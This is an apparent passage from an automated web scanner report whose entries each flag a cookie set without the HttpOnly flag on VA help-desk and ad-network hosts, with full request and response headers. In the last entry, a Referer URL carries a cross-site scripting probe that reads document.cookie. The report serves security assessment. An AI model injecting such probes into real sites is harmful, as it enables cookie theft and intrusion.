Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=162278755.1304039398.1.1.utmcsr=qriocity.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/en/; __utma=162278755.897277051.1304039398.1304039398.1304039398.1

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:45:59 GMT
P3P: policyref="http://iris.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Cache-Control: no-cache
Expires: -1
Pragma: no-cache
Set-Cookie: cp_session=aU_pMUOYs07f6ikNnhs77hXknNLrnZxHB3BzmZU1_5792wAwkVsh0glXqTf4M4QBUlJjL9CQDoDbsSVeM65twoSsIsv2AlM1GTd2DiUFRgHGi%7EBwNjTS626WHfMrJjwDtsFuF320fTHD%7EL8hE5q1QnsToFNBEUVjpa; path=/; httponly
RNT-Time: D=85565 t=1304124359766778
RNT-Machine: 05
X-Cnection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: TS2744aa=09fc138b83f944b6bf4686c9c65f5bc79d428e54096116a84dbb5bc7; Max-Age=900; Path=/
Content-Length: 29357

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US">
<h
...[SNIP]...

14.393. https://iris.custhelp.com/app/answers/detail/a_id/936/session/L3RpbWUvMTMwNDEyNDM1OS9zaWQvUlBRT3NLc2s%3D  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://iris.custhelp.com
Path:   /app/answers/detail/a_id/936/session/L3RpbWUvMTMwNDEyNDM1OS9zaWQvUlBRT3NLc2s%3D

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /app/answers/detail/a_id/936/session/L3RpbWUvMTMwNDEyNDM1OS9zaWQvUlBRT3NLc2s%3D HTTP/1.1
Host: iris.custhelp.com
Connection: keep-alive
Referer: https://iris.custhelp.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=162278755.1304039398.1.1.utmcsr=qriocity.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/en/; __utma=162278755.897277051.1304039398.1304039398.1304039398.1; cp_session=aUxqbSmDTF9zJzhBJfb1F92LWC0Kf6M_chBVcBdbVsBdRhTE4dyBudDel3PBTMCcbt0G5M4_5w9JcZdV4VybHjLGNcGrrzNw5hbxYIGFEGupqUcu8pKx88tHF%7EKERiv3JVy5NkYDf%7Ew_LkB2Yurou0ES9QOGtwgf_w; TS2744aa=cc7e1e5c7e26af0307fed34a81cbc2ae25ed35bd7c0894804dbb5bc6; TS8118ae=fc55d15bba74fd0fe00178b9b0b1faef85ea932776fb04994dbb5bcc

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:47:53 GMT
P3P: policyref="http://iris.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Cache-Control: no-cache
Expires: -1
Pragma: no-cache
Set-Cookie: cp_session=aUO4heum5AKkuwxGWoE6FNq47IQuI0K3%7EesduKqMc2PH1xFkl_06%7EMc02V8p7wHXmU4qXdWo%7EG8SO8STexiMgGVeYJPP41Y2C8G73MIrQvkPCRgKYdeWQX9FFf_ns2swT2oj18%7EAxHEffu%7EZaLclJ9n3bX1LoWn1rOVPybe3voqjfzQsAWxdmmB1Qa6yeQa3CtkuzM3hLdu_M%21; path=/; httponly
RNT-Time: D=119504 t=1304124473961813
RNT-Machine: 05
X-Cnection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: TS8118ae=fc55d15bba74fd0fe00178b9b0b1faef85ea932776fb04994dbb5bcc; Max-Age=900; Path=/
Content-Length: 41356

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US">
<h
...[SNIP]...

14.394. https://iris.custhelp.com/app/home  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://iris.custhelp.com
Path:   /app/home

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /app/home HTTP/1.1
Host: iris.custhelp.com
Connection: keep-alive
Referer: https://iris.custhelp.com/app/answers/detail/a_id/936/session/L3RpbWUvMTMwNDEyNDM1OS9zaWQvUlBRT3NLc2s%3D
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=162278755.1304039398.1.1.utmcsr=qriocity.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/en/; __utma=162278755.897277051.1304039398.1304039398.1304039398.1; TS2744aa=cc7e1e5c7e26af0307fed34a81cbc2ae25ed35bd7c0894804dbb5bc6; cp_session=aUikFgcgagxbyNc6bBtpeAQnz7CbRGl0HlRzZw2K1u6edMsf05RsqY6Jl_TQ7FD8V8UJLcPs38AKjZaz9yZMFx2WW_4hETSJaa8SWL6Gai4cTEyE37ZS91mPSrHyisikTcaqGGB7D4rm_I8eWdX2vRnCdn0jquco1jHNqXYnB9pLAHxc_Mv7Sq_J5b8jggGTmw9bepkVPoknY%21; TS8118ae=6c3373cb5cc5ffbbcc089968f4a020a385ea932776fb04994dbb5ef8

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:59:40 GMT
P3P: policyref="http://iris.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Cache-Control: no-cache
Expires: -1
Pragma: no-cache
Set-Cookie: cp_session=aUeZ92xvAiog2ot2mp%7EDI%7ETV3biufKo2ghCIg8Bbbgym7%7EM4tR89%7EoZImybuJkUdn9JgJowfZXeBha7Hr2V4NLkp21KWcXOXWsuX33nYejEUbzoXpGPGzla62VARg97DltonmiiehtJ8IbDlMWX_D7czyU7dwa9mvVNhsCGNtS6GRqzjYivCnW0txXc7FeP9TqvsO0gLqXGaE%21; path=/; httponly
RNT-Time: D=88319 t=1304125180207538
RNT-Machine: 05
X-Cnection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: TS8118ae=6c3373cb5cc5ffbbcc089968f4a020a385ea932776fb04994dbb5ef8; Max-Age=900; Path=/
Content-Length: 28903

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US">
<h
...[SNIP]...

14.395. https://iris.custhelp.com/euf/assets/css/2009/jkmegamenu.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://iris.custhelp.com
Path:   /euf/assets/css/2009/jkmegamenu.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /euf/assets/css/2009/jkmegamenu.css HTTP/1.1
Host: iris.custhelp.com
Connection: keep-alive
Referer: https://iris.custhelp.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=162278755.1304039398.1.1.utmcsr=qriocity.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/en/; __utma=162278755.897277051.1304039398.1304039398.1304039398.1; cp_session=aUxqbSmDTF9zJzhBJfb1F92LWC0Kf6M_chBVcBdbVsBdRhTE4dyBudDel3PBTMCcbt0G5M4_5w9JcZdV4VybHjLGNcGrrzNw5hbxYIGFEGupqUcu8pKx88tHF%7EKERiv3JVy5NkYDf%7Ew_LkB2Yurou0ES9QOGtwgf_w; TS2744aa=cc7e1e5c7e26af0307fed34a81cbc2ae25ed35bd7c0894804dbb5bc6

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:46:01 GMT
Last-Modified: Wed, 16 Mar 2011 01:07:55 GMT
Accept-Ranges: bytes
Cache-Control: max-age=900
Expires: Sat, 30 Apr 2011 01:01:01 GMT
RNT-Time: D=740 t=1304124361908316
RNT-Machine: 04
X-Cnection: close
Content-Type: text/css
Set-Cookie: TS8118ae=3d9fb9b0125b7347b5fb7b4d53cdd7e2de20e7210a4186634dbb5bc9; Max-Age=900; Path=/
Connection: Keep-Alive
Content-Length: 4494


#banner-area-menu {width:996px; height:17px; margin:0; padding: 2px 0 0 0; clear:both; background:#000033; position:relative;}


#banner-area-menu ul {padding:0; margin:0;}

#banner-area-menu u
...[SNIP]...

14.396. https://iris.custhelp.com/euf/assets/css/2009/va-styles.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://iris.custhelp.com
Path:   /euf/assets/css/2009/va-styles.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /euf/assets/css/2009/va-styles.css HTTP/1.1
Host: iris.custhelp.com
Connection: keep-alive
Referer: https://iris.custhelp.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=162278755.1304039398.1.1.utmcsr=qriocity.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/en/; __utma=162278755.897277051.1304039398.1304039398.1304039398.1; cp_session=aUxqbSmDTF9zJzhBJfb1F92LWC0Kf6M_chBVcBdbVsBdRhTE4dyBudDel3PBTMCcbt0G5M4_5w9JcZdV4VybHjLGNcGrrzNw5hbxYIGFEGupqUcu8pKx88tHF%7EKERiv3JVy5NkYDf%7Ew_LkB2Yurou0ES9QOGtwgf_w; TS2744aa=cc7e1e5c7e26af0307fed34a81cbc2ae25ed35bd7c0894804dbb5bc6

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:46:01 GMT
Last-Modified: Wed, 16 Mar 2011 01:07:55 GMT
Accept-Ranges: bytes
Cache-Control: max-age=900
Expires: Sat, 30 Apr 2011 01:01:01 GMT
RNT-Time: D=590 t=1304124361911269
RNT-Machine: 04
X-Cnection: close
Content-Type: text/css
Set-Cookie: TS8118ae=f571b6d7caee8158775792d053afcdcee9d7bb51d989b78a4dbb5bc9; Max-Age=900; Path=/
Connection: Keep-Alive
Content-Length: 5606

.mainbody {
   background-color: #C0C0C0;
   color: #000000;
   font-family: Verdana, Geneva, sans-serif;
   font-size: 12px;
   margin: 0px;
   padding: 20px 0px 20px 0px;
   position: relative;
   text-a
...[SNIP]...

14.397. https://iris.custhelp.com/euf/assets/css/2009/va-user-styles.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://iris.custhelp.com
Path:   /euf/assets/css/2009/va-user-styles.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /euf/assets/css/2009/va-user-styles.css HTTP/1.1
Host: iris.custhelp.com
Connection: keep-alive
Referer: https://iris.custhelp.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=162278755.1304039398.1.1.utmcsr=qriocity.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/en/; __utma=162278755.897277051.1304039398.1304039398.1304039398.1; cp_session=aUxqbSmDTF9zJzhBJfb1F92LWC0Kf6M_chBVcBdbVsBdRhTE4dyBudDel3PBTMCcbt0G5M4_5w9JcZdV4VybHjLGNcGrrzNw5hbxYIGFEGupqUcu8pKx88tHF%7EKERiv3JVy5NkYDf%7Ew_LkB2Yurou0ES9QOGtwgf_w; TS2744aa=cc7e1e5c7e26af0307fed34a81cbc2ae25ed35bd7c0894804dbb5bc6

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:46:01 GMT
Last-Modified: Wed, 16 Mar 2011 01:07:55 GMT
Accept-Ranges: bytes
Cache-Control: max-age=900
Expires: Sat, 30 Apr 2011 01:01:01 GMT
RNT-Time: D=452 t=1304124361848208
RNT-Machine: 05
X-Cnection: close
Content-Type: text/css
Set-Cookie: TS8118ae=e74f57f44182b7718c23ae70d70012842a9902cf448e753e4dbb5bc9; Max-Age=900; Path=/
Connection: Keep-Alive
Content-Length: 2504

/*
File............: /va_files/styles/va-user-styles.css
Description.....: Styles available for use in the page content area
Version.........: 1.0
Release Date....: December 19, 2005
*/

...[SNIP]...

14.398. https://iris.custhelp.com/euf/assets/css/2009/vaSearch.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://iris.custhelp.com
Path:   /euf/assets/css/2009/vaSearch.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /euf/assets/css/2009/vaSearch.css HTTP/1.1
Host: iris.custhelp.com
Connection: keep-alive
Referer: https://iris.custhelp.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=162278755.1304039398.1.1.utmcsr=qriocity.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/en/; __utma=162278755.897277051.1304039398.1304039398.1304039398.1; cp_session=aUxqbSmDTF9zJzhBJfb1F92LWC0Kf6M_chBVcBdbVsBdRhTE4dyBudDel3PBTMCcbt0G5M4_5w9JcZdV4VybHjLGNcGrrzNw5hbxYIGFEGupqUcu8pKx88tHF%7EKERiv3JVy5NkYDf%7Ew_LkB2Yurou0ES9QOGtwgf_w; TS2744aa=cc7e1e5c7e26af0307fed34a81cbc2ae25ed35bd7c0894804dbb5bc6

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:46:01 GMT
Last-Modified: Wed, 16 Mar 2011 01:07:55 GMT
Accept-Ranges: bytes
Cache-Control: max-age=900
Expires: Sat, 30 Apr 2011 01:01:01 GMT
RNT-Time: D=853 t=1304124361876499
RNT-Machine: 02
X-Cnection: close
Content-Type: text/css
Set-Cookie: TS8118ae=e01496e8a2ad5c95c6c9bd60023271e0ae202d966e68cbd74dbb5bc9; Max-Age=900; Path=/
Connection: Keep-Alive
Content-Length: 1752

/* CSS Document */
#search-area {
   text-align: right;
   float:right;
}

#search-area form {
margin: 0px;
padding: 0px;
}

/* hide the label for the main input field */
#mainSearchForm l
...[SNIP]...

14.399. https://iris.custhelp.com/euf/rightnow/optimized/templates/ps_iris_home1302801724.themes.iris.SITE.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://iris.custhelp.com
Path:   /euf/rightnow/optimized/templates/ps_iris_home1302801724.themes.iris.SITE.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /euf/rightnow/optimized/templates/ps_iris_home1302801724.themes.iris.SITE.css HTTP/1.1
Host: iris.custhelp.com
Connection: keep-alive
Referer: https://iris.custhelp.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=162278755.1304039398.1.1.utmcsr=qriocity.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/en/; __utma=162278755.897277051.1304039398.1304039398.1304039398.1; cp_session=aUxqbSmDTF9zJzhBJfb1F92LWC0Kf6M_chBVcBdbVsBdRhTE4dyBudDel3PBTMCcbt0G5M4_5w9JcZdV4VybHjLGNcGrrzNw5hbxYIGFEGupqUcu8pKx88tHF%7EKERiv3JVy5NkYDf%7Ew_LkB2Yurou0ES9QOGtwgf_w; TS2744aa=cc7e1e5c7e26af0307fed34a81cbc2ae25ed35bd7c0894804dbb5bc6

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:46:01 GMT
Last-Modified: Thu, 14 Apr 2011 17:22:11 GMT
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Expires: Mon, 30 May 2011 00:46:01 GMT
RNT-Time: D=1790 t=1304124361295257
RNT-Machine: 01
X-Cnection: close
Content-Type: text/css
Set-Cookie: TS8118ae=232a6f61fd5d037daba9afae047adde2e1323d437019bcac4dbb5bc9; Max-Age=900; Path=/
Connection: Keep-Alive
Content-Length: 18647

body,div,dl,dt,dd,ul,ol,li,h1,h2,h3,h4,h5,h6,pre,code,form,fieldset,legend,input,textarea,p,blockquote,th,td{margin:0;padding:0;*z-index:1;}
table{border-collapse:collapse;border-spacing:0;}
fieldset,
...[SNIP]...

14.400. https://iris.custhelp.com/rnt/rnw/css/enduser.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://iris.custhelp.com
Path:   /rnt/rnw/css/enduser.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rnt/rnw/css/enduser.css HTTP/1.1
Host: iris.custhelp.com
Connection: keep-alive
Referer: https://iris.custhelp.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=162278755.1304039398.1.1.utmcsr=qriocity.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/en/; __utma=162278755.897277051.1304039398.1304039398.1304039398.1; cp_session=aUxqbSmDTF9zJzhBJfb1F92LWC0Kf6M_chBVcBdbVsBdRhTE4dyBudDel3PBTMCcbt0G5M4_5w9JcZdV4VybHjLGNcGrrzNw5hbxYIGFEGupqUcu8pKx88tHF%7EKERiv3JVy5NkYDf%7Ew_LkB2Yurou0ES9QOGtwgf_w; TS2744aa=cc7e1e5c7e26af0307fed34a81cbc2ae25ed35bd7c0894804dbb5bc6

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:46:04 GMT
Last-Modified: Sun, 09 Jan 2011 05:13:20 GMT
Accept-Ranges: bytes
Cache-Control: max-age=900
Expires: Sat, 30 Apr 2011 01:01:04 GMT
RNT-Time: D=465 t=1304124364543617
RNT-Machine: 02
X-Cnection: close
Content-Type: text/css
Set-Cookie: TS8118ae=fc55d15bba74fd0fe00178b9b0b1faef85ea932776fb04994dbb5bcc; Max-Age=900; Path=/
Connection: Keep-Alive
Content-Length: 9807

/* --------------------------------------------------------------------------
*
* RNW Enduser Interface Stylesheet (enduser.css)
*
*/


a.fcn
{ text-decoration: none; color: black }
a.fcn:visited
...[SNIP]...

14.401. https://iris.custhelp.com/rnt/rnw/img/enduser/2009/img-bullet.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://iris.custhelp.com
Path:   /rnt/rnw/img/enduser/2009/img-bullet.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rnt/rnw/img/enduser/2009/img-bullet.gif HTTP/1.1
Host: iris.custhelp.com
Connection: keep-alive
Referer: https://iris.custhelp.com/app/answers/detail/a_id/936/session/L3RpbWUvMTMwNDEyNDM1OS9zaWQvUlBRT3NLc2s%3D
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=162278755.1304039398.1.1.utmcsr=qriocity.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/en/; __utma=162278755.897277051.1304039398.1304039398.1304039398.1; TS2744aa=cc7e1e5c7e26af0307fed34a81cbc2ae25ed35bd7c0894804dbb5bc6; cp_session=aUikFgcgagxbyNc6bBtpeAQnz7CbRGl0HlRzZw2K1u6edMsf05RsqY6Jl_TQ7FD8V8UJLcPs38AKjZaz9yZMFx2WW_4hETSJaa8SWL6Gai4cTEyE37ZS91mPSrHyisikTcaqGGB7D4rm_I8eWdX2vRnCdn0jquco1jHNqXYnB9pLAHxc_Mv7Sq_J5b8jggGTmw9bepkVPoknY%21; TS8118ae=fc55d15bba74fd0fe00178b9b0b1faef85ea932776fb04994dbb5bcc

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:59:36 GMT
Last-Modified: Sun, 09 Jan 2011 05:13:56 GMT
Accept-Ranges: bytes
Content-Length: 73
Cache-Control: max-age=900
Expires: Sat, 30 Apr 2011 01:14:36 GMT
RNT-Time: D=420 t=1304125176794949
RNT-Machine: 04
X-Cnection: close
Content-Type: image/gif
Set-Cookie: TS8118ae=6c3373cb5cc5ffbbcc089968f4a020a385ea932776fb04994dbb5ef8; Max-Age=900; Path=/

GIF89a..........ww....DD|..M.........!.......,...........H.C.0.....E.H..;

14.402. https://iris.custhelp.com/rnt/rnw/javascript/2009/global.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://iris.custhelp.com
Path:   /rnt/rnw/javascript/2009/global.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rnt/rnw/javascript/2009/global.js HTTP/1.1
Host: iris.custhelp.com
Connection: keep-alive
Referer: https://iris.custhelp.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=162278755.1304039398.1.1.utmcsr=qriocity.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/en/; __utma=162278755.897277051.1304039398.1304039398.1304039398.1; cp_session=aUxqbSmDTF9zJzhBJfb1F92LWC0Kf6M_chBVcBdbVsBdRhTE4dyBudDel3PBTMCcbt0G5M4_5w9JcZdV4VybHjLGNcGrrzNw5hbxYIGFEGupqUcu8pKx88tHF%7EKERiv3JVy5NkYDf%7Ew_LkB2Yurou0ES9QOGtwgf_w; TS2744aa=cc7e1e5c7e26af0307fed34a81cbc2ae25ed35bd7c0894804dbb5bc6

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:46:03 GMT
Last-Modified: Wed, 16 Mar 2011 01:07:55 GMT
Accept-Ranges: bytes
Content-Length: 462
Cache-Control: max-age=900
Expires: Sat, 30 Apr 2011 01:01:03 GMT
RNT-Time: D=795 t=1304124363945766
RNT-Machine: 01
X-Cnection: close
Content-Type: application/x-javascript
Set-Cookie: TS8118ae=825257ac4c5eed1a6ecc18140b79cd7374eb092c0fc3ce704dbb5bcb; Max-Age=900; Path=/

document.write('<script type="text/javascript" src="/rnt/rnw/javascript/2009/jquery-min-modified.js"></script>');
document.write('<script type="text/javascript" src="/rnt/rnw/javascript/2009/jquery-b
...[SNIP]...

14.403. https://iris.va.gov/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://iris.va.gov
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: iris.va.gov
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fsr.s={"v":1,"rid":"1304117532703_517290","pv":2,"to":5,"c":"http://www.va.gov/landing2_contact.htm","lc":{"d2":{"v":2,"s":false}},"cd":2,"sd":2,"f":1304124227976}

Response

HTTP/1.0 302 Found
Location: http://www.va.gov/iris/home.html
Connection: Keep-Alive
Content-Length: 0
Set-Cookie: TS37e6d1=4bcb8063f21d061f51ef1c3a60441adf25cdfae3e9bf86364dbb5be2; Max-Age=900; Path=/


14.404. http://kdkgllry.netmng.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kdkgllry.netmng.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?aid=195 HTTP/1.1
Host: kdkgllry.netmng.com
Proxy-Connection: keep-alive
Referer: http://www.kodakgallery.com/gallery/lp/2010/visit_florida/vacation_photos.jsp?e81c7*/alert(document.cookie)//4c687dfaa6f=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=cb45f86e-c186-488a-9d0f-aec6be178ed4; evo5=z2r8aytrpwakd%7CaX1f%2BX%2FH0XmnewULrgjFuBdyNO5Bfd3pDQ5D3BffaKygm7dWhxyfMeptI88DhCWPCMieuKmcL2x7c%2BH19wRjGU6WMC%2Fj5YTTPSS3NzPOIqDufmtYKfD%2Fi7sByDhAGs4OaaGcL4fkM8ToE%2B1SbyyQPiv4JgRuJqgqvzAT0PhUc2Qq%2FA2FuWNxwCQiehpdqupOwMrOGkuNMKcb6Y%2BAaCdn6sjXowEdBlDwqn1M5yyByn0Mo2yD2HaLuUD5MWy4CYKI6X7QwffnTgfB6NG4hGmbw6tDbDL4x7rpuRd4CBCv9vA%3D

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 15:08:18 GMT
Server: Apache/2.2.9
P3P: policyref="http://kdkgllry.netmng.com/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR BUS COM NAV"
Expires: Thu, 28 Apr 2011 15:08:18 GMT
Last-Modified: Thu, 28 Apr 2011 15:08:18 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: evo5=z2r8aytrpwakd%7CCTvIgdEfUb%2F9H0h1IG38d1tn%2BRDKtRvPJHr%2F4JbkUcJaLDzz3yKCVJRWJJZ3OdFCrEUa2%2BL0P3gBIzFh22vC0k4yj17hP8pDj%2BTAfvBIpBoSHiic4MgkNLd9vkgQEVSQZWApasK%2BWaqI5A%2Fa0%2Ba27%2Bl4R7r4AMAWBAv4nPkbYKg7Jup%2Bh9SLxhC5EX8Xs9A1W2%2BYk58LvGr7ybFr1Fv22Lx1%2BprOhpordmXze4uipLrF7jKamjQQMIVdULuDCGjMEidtz9ntZaDzB27ApAMkrnxu0BuWDBMwST1wWX%2BHJpmdilKLYsgFPIgs0U5uwfyDwSmlHQk7f0ZS9h%2BYwqFnSg%3D%3D; expires=Sun, 30-Oct-2011 15:08:18 GMT; path=/; domain=.netmng.com
Content-Length: 1013
